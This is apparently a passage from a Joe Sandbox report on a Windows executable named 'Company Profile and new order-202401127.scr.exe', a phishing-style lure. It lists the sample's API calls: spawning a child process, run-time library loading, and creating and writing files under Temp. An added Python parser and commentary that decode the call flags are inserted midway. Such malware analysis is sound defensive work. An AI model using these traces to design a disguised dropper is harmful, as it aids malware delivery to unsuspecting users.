                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                                            • Instruction ID: add67a47d66b636189698deb609c527a6af1c8d9f2ae6a081c6d5e40f6b59c33
                                                                                            • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                                            • Instruction Fuzzy Hash: 30E04F72B11214ABCB15DBA8EDD086E73B6EB48320350443FD102B3690CB759C458B58
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                              • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                              • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                              • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                            • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                            • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                            • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
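The two records above that matter most for triage are the CreateProcessW/CloseHandle pair and the GetModuleHandleA/GetProcAddress function whose subcall builds a path from GetSystemDirectoryW and hands it to LoadLibraryExW. The report prints their flag arguments only as raw hex (04000000 on CreateProcessW, 00000008 on LoadLibraryExW). The following Python parser is an added example, not part of the Joe Sandbox report or its tooling: it reads the "APIs" lines in the format shown on this page, splits them into per-record call sequences, and names the bits of the known flag arguments using the Windows SDK constants. The sample input is constructed by copying the API lines of those two records; the regular expression and the flag tables are the example's own assumptions about the listing format and are not exhaustive.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox report and decode the
constant arguments that the listing shows only as raw hex (added example)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the "APIs" blocks of two function records, copied from this
# report (CreateProcessW/CloseHandle, and GetModuleHandleA/GetProcAddress with
# its GetSystemDirectoryW -> wsprintfW -> LoadLibraryExW subcalls).
SAMPLE_RECORDS = """\
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
• CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
Memory Dump Source
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
• GetProcAddress.KERNEL32(00000000,?), ref: 00406942
  • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
  • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
  • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
Memory Dump Source
"""

# Assumed line shape: "• [Part of subcall function XXXXXXXX: ]Func.MODULE(args), ref: XXXXXXXX"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Windows SDK values (winbase.h / libloaderapi.h); only the bits seen in practice.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}
LOAD_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
}
# (function, zero-based index of the flag argument) -> bit-name table
FLAG_TABLES = {
    ("CreateProcessW", 5): CREATION_FLAGS,   # dwCreationFlags
    ("LoadLibraryExW", 2): LOAD_FLAGS,       # dwFlags
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # stack arguments as printed; "?" means not recovered
    ref: str                 # call-site address in the dump
    subcall: Optional[str]   # caller when the line is "Part of subcall function"


def parse_records(text: str) -> List[List[ApiCall]]:
    """Start a new record at every "APIs" header and collect the call lines under it."""
    records: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        m = API_LINE.match(line)
        if m and records:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            records[-1].append(ApiCall(m.group("fn"), m.group("mod"), args,
                                       m.group("ref").upper(), m.group("sub")))
    return records


def api_sequence(record: List[ApiCall]) -> List[str]:
    """Call names in listed order, subcalls included (the order the report shows)."""
    return [c.name for c in record]


def decode_flags(call: ApiCall) -> Optional[List[str]]:
    """Name the set bits of a known flag argument; None when the call has no such
    argument or the sandbox printed "?" for it. Unknown leftover bits stay as hex."""
    for (fn, idx), table in FLAG_TABLES.items():
        if call.name == fn and idx < len(call.args) and call.args[idx] != "?":
            value = int(call.args[idx], 16)
            names = [n for bit, n in table.items() if value & bit]
            rest = value & ~sum(table)   # keys are disjoint bits, so sum == OR
            if rest:
                names.append(f"0x{rest:08X}")
            return names
    return None


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_RECORDS):
        print(" -> ".join(api_sequence(rec)))
        for c in rec:
            flags = decode_flags(c)
            if flags is not None:
                print(f"  {c.name} @ {c.ref}: {' | '.join(flags) or 'none'}")
```

Run against the two records it resolves 04000000 to CREATE_DEFAULT_ERROR_MODE and 00000008 to LOAD_WITH_ALTERED_SEARCH_PATH, and the 00000104 passed to GetSystemDirectoryW is MAX_PATH (260). Read with care: a DLL loaded by an absolute path under the system directory with LOAD_WITH_ALTERED_SEARCH_PATH is the standard defence against search-order hijacking, and CREATE_DEFAULT_ERROR_MODE only stops the child inheriting the parent's error mode, so neither flag is malicious on its own; what the records do establish is that this stub resolves imports at run time and spawns a child whose handle it closes without any wait call in the same function.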
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00406015
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
• Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
• Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
• Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
• Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
• Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
• Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
• Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
• Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
• Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
• Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
APIs
• SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
• Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
• Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
• Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
Memory Dump Source
• Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                            • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                            • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                            • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                            APIs
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                              • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2,004033F2,Completed,00000000,00418EC0,00000000), ref: 00405601
                                                                                              • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                              • Part of subcall function 00405B04: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
                                                                                              • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                              • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                                                              • Part of subcall function 004069C0: GetExitCodeProcess.KERNEL32(?,?), ref: 004069F3
                                                                                              • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 7545d22a5fc035c86024504f61a73d8965a0f4e8d6e977bbe1ed3d5def72935c
                                                                                            • Instruction ID: fabaa3b6efc7a57357b2805df35000a41c8f44054e7a675a900f3985a4c8ce8a
                                                                                            • Opcode Fuzzy Hash: 7545d22a5fc035c86024504f61a73d8965a0f4e8d6e977bbe1ed3d5def72935c
                                                                                            • Instruction Fuzzy Hash: E8F06772905125ABDB20BBA599849DE72B59B00328B25413FE102B22E1C77C4E469AAE
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                            • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                              • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                              • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                              • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                              • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                              • Part of subcall function 004067CF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                            • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                              • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                              • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                              • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\nonopposable\ff4
                                                                                            • API String ID: 2624150263-1139733992
                                                                                            • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                            • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                                                            • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                            • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nonopposable\ff4, xrefs: 0040226E
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nonopposable\ff4
                                                                                            • API String ID: 542301482-404807915
                                                                                            • Opcode ID: 1237ecbe1a24820be3362f10cc5c3b228794691ac2f4f382d33571bf816e5826
                                                                                            • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                                                            • Opcode Fuzzy Hash: 1237ecbe1a24820be3362f10cc5c3b228794691ac2f4f382d33571bf816e5826
                                                                                            • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                                            • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                                                            • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                                            • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                            • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
